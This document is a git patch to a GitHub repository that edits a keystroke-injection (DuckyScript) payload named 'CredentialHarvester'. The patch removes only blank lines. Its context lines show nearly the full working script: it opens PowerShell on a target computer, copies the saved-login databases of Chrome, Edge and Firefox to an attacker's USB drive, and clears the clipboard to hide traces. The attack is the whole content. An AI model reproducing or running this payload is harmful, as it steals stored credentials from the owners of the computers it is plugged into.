From e0fc630301cc908a67937af5f87dd0435c3f0d0a Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Mon, 20 May 2024 11:39:36 -0400 Subject: [PATCH] Update 0. CredentialHarvester --- 0. CredentialHarvester | 8 -------- 1 file changed, 8 deletions(-) diff --git a/0. CredentialHarvester b/0. CredentialHarvester index 491f3c6..809d375 100644 --- a/0. CredentialHarvester +++ b/0. CredentialHarvester @@ -3,8 +3,6 @@ REM ############## This script was created by github.com/markcyb REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## REM ############## The extracted data will require decryption ############## REM ################################################################################################################## - - REM Open PowerShell with elevated privileges DELAY 1000 GUI r @@ -13,7 +11,6 @@ STRING powershell DELAY 500 ENTER DELAY 1000 - REM Check if the USB drive exists STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; STRING if ($usbDrive -ne $null) { @@ -28,19 +25,16 @@ DELAY 500 STRING cd BrowserData; ENTER DELAY 500 - REM Copy Chrome Login Data to USB STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } ENTER DELAY 500 - REM Copy Firefox Login Data to USB STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } ENTER DELAY 500 - REM Copy Edge Login Data to USB STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } @@ -49,12 +43,10 @@ DELAY 500 STRING } ENTER DELAY 500 - REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) STRING echo off | clip ENTER DELAY 500 - REM Close PowerShell STRING exit ENTER